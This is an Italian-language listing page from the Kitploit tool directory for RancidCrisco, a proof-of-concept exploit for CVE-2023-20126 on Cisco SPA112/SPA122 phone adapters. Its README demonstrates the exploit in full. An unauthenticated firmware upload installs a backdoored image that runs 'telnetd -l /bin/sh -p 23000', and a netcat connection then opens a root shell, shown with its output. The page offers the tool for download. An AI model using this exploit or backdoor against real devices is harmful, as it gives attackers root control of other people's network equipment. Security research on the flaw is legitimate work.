Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RancidCrisco — Exploit proof-of-concept per CVE-2023-20126 che mira agli adattatori telefonici Cisco SPA. Carica firmware dannoso per ottenere una shell root sulla porta 23000/tcp tramite telnetd. | Kitploit
Strumenti/GitHubGitHub/fullspectrumdev/rancidcrisco
Sicurezza Sistemi EmbeddedAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza Hardware e IoTRed TeamingStrumento di Accesso RemotoAnalisi del Firmware
GitHubfullspectrumdev/rancidcrisco

RancidCrisco

Exploit proof-of-concept per CVE-2023-20126 che mira agli adattatori telefonici Cisco SPA. Carica firmware dannoso per ottenere una shell root sulla porta 23000/tcp tramite telnetd.

242173 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

RancidCrisco

PoC minimo funzionante per CVE-2023-20126

Questa è la versione iniziale. Funziona, ma è l'exploit del 'caso più semplice'.

Testato e funzionante su SPA112/SPA122 - SPA232D richiede un'immagine firmware diversa.

Fornisce una root-shell sulla porta 23000/tcp.

Devo ancora ripulire la toolchain usata per modificare il firmware e probabilmente la metterò in un repository diverso. È basata principalmente sul lavoro di @BigNerd95, ma con piccole modifiche per funzionare con i file firmware SPA112/122.

Demo.

root@kitploit:~
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0

File

  • fwupload.py - uploader di immagini firmware che bypassa l'autenticazione semplicemente non inviandone alcuna, sfruttando CVE-2023-20126. Accetta due argomenti: l'URL della Web UI del dispositivo e il file firmware da caricare.
  • telnet-23000.bin - immagine firmware dannosa Proof of Concept che avvia telnetd -l /bin/sh -p 23000, fornendo una root shell sulla porta 23000/tcp. Basata sul lavoro di bignerd95.

Licenza

WTFPL.

Bug

usare le issue di git.

Disclaimer

Se questo brickka il tuo fottuto dispositivo, non mi assumo alcuna responsabilità.
È un TUO problema.
Voglio dire, ho messo insieme quel firmware backdoorato in una sera.
Inoltre, perché non stai seguendo il writeup e costruendo il tuo firmware backdoorato?

Scarica lo strumento